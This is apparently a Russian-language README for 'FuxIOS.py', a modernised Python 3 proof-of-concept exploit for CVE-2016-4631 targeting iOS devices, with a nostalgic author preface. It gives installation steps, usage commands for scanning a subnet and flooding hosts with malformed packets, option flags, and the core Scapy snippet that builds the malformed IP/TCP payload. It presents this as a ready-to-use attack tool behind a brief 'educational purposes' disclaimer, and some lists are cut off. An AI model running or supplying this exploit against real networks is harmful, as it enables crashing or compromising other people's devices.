
Модернизированный эксплойт PoC на Python 3 для CVE-2016-4631, нацеленный на устройства iOS. Особенности: сетевое сканирование, генерация некорректных IP/TCP полезных нагрузок и инъекция пакетов для авторизованного тестирования безопасности и образовательных целей.
Почему я публикую это сейчас?
Просматривая старые жёсткие диски и забытые репозитории, я наткнулся на этот скрипт, который написал много лет назад, когда только начинал свою карьеру в кибербезопасности. Это было другое время — Python 2.7 был в фаворе, уязвимости вроде CVE-2016-4631 были обычным делом, и каждый работающий PoC ощущался как маленькая победа.
Глядя на этот код спустя столько времени, я не мог не почувствовать ностальгию. Я вспомнил те ночи, потраченные на отладку эксплойтов, волнение от сообщения «Payload sent successfully» и то, как каждый скрипт был очередным шагом в моём обучении. Хотя сегодня я работаю с гораздо более продвинутыми технологиями, этот маленький скрипт символизирует мои первые шаги в мире offensive security.
Я решил модернизировать его и выложить не только из ностальгии, но и потому, что считаю, что он может быть полезен другим, кто только начинает свой путь в кибербезопасности. Это напоминание о том, что все мы с чего-то начинали, и что эти первые «простые» скрипты — основа всего, что будет дальше.
F0LloW_Th3_R4ts — такова была моя подпись тогда... некоторые коды не забываются. 🐀
— BONKERS, Июль 2025
FuxIOS.py — это обновлённый Proof of Concept (PoC) для уязвимости CVE-2016-4631, затрагивающей устройства iOS. Эта версия полностью переписана и модернизирована для Python 3 со значительными улучшениями функциональности, безопасности и удобства использования.
list_of_ips → list_ips# Установка nmap (требуется для python-nmap)
# Windows: Скачать с https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Клонировать репозиторий
git clone <repo-url>
cd FuxiOS
# Установить зависимости
pip install -r requirements.txt
# Или вручную:
pip install scapy python-nmap
# Базовое использование
sudo python3 FuxIOS.py
# Настройка параметров
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Расширенные опции
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Просмотр справки
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: IP-адрес источника атаки (по умолчанию: 192.168.1.95)-n, --network: Целевая подсеть (по умолчанию: 192.168.1.0/24)-m, --max-payload: Максимальный размер полезной нагрузки (по умолчанию: 40)-d, --delay: Задержка между пакетами в секундах (по умолчанию: 0.2)--interactive: Интерактивный режим для совместимости# Вредоносный пакет
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Этот инструмент должен использоваться исключительно для:
Журналы сохраняются в файл fuxios_exploit.log и включают:
Ошибка: "No module named 'scapy'"
pip install scapy
Ошибка: "No module named 'nmap'"
pip install python-nmap
# И убедитесь, что nmap установлен в системе
Ошибка: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Запустите PowerShell/CMD от имени администратора
Windows: "WinPcap/Npcap not found"
Этот проект предназначен только для образовательных целей. Автор не несёт ответственности за неправомерное использование данного инструмента.
Помните: «F0LloW_Th3_R4ts <:8)~~ <:8)~~»